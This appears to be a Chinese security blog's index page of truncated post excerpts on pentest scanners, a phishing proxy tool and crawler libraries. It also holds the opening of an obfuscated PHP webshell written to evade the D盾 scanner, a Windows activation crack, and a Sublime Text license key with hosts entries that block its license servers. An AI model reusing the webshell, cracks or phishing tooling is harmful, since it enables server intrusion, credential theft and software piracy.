网络安全

工具有点老旧，但昨天用到了，还不错，轻巧 网络资产信息扫描 在渗透测试(特别是内网渗透)中经常需要对目标进行网络资产收集，即探测对方服务器都有哪些IP，IP上开了哪些端口，端口上运行着哪些服务。 该...

Hwidgen永久激活 以前Windows基本都是用KMS激活工具，激动180天后循环激活。而HWIDGen是真正意义上的永久激活，它的激活原理是获取Windows10的数字许可证。 所谓win10数字权利激活，是win10官方的一种授权...

可用于：Sublime Text 3 Serial key build is 3200 + host添加 127.0.0.1 www.sublimetext.com 127.0.0.1 license.sublimehq.com Sublime Text 3 3208 license key — BEGIN LICENSE —– ZYNGA INC. 5...

之前给的过D盾一句话webshell现在都已被查杀，补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $...

Muraena介绍 Muraena是一个基于反向代理的自动化网络钓鱼工具。使用Go编程语言编写，支持HTTPS证书。该工具包含一个充当反向代理的小型web服务器和一个爬虫程序。该爬虫程序可以自动确定从合法网站代理哪些资...

JSFinder介绍 JSFinder是一款用作快速在网站的js文件中提取URL，子域名的脚本工具。 支持用法 简单爬取深度爬取批量指定URL/指定JS其他参数 以往我们子域名多数使用爆破或DNS中获得，这个脚本从JS文...

xray介绍 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具。 支持功能 独立的 URL 扫描基于 HTTP 的被动代理扫描，同时支持HTTPSSQL注入检测模块命令注入检测模块任意重定向检测模块路径遍历...

Crawlab介绍 Crawlab是一款基于Celery的爬虫分布式爬虫管理平台，支持多种编程语言以及多种爬虫框架。 Crawlab的架构跟Celery非常相似，但是加入了包括前端、爬虫、Flower在内的额外模块，以支持爬虫...

越来越多的网站具有反爬虫特性，有的用图片隐藏关键数据，有的使用反人类的验证码，建立反爬虫的代码仓库。该项目运用请求伪造，浏览器伪造，浏览器自动化，图像处理，ip处理等方式进行反爬虫技术的通用化代码库...

Vxscan介绍 python3写的综合扫描工具，主要用来敏感文件探测(目录扫描与js泄露接口)，WAF/CDN识别，端口扫描，指纹/服务识别，操作系统识别，弱口令探测，POC扫描，SQL注入，绕过CDN，查询旁站等功能，主要用...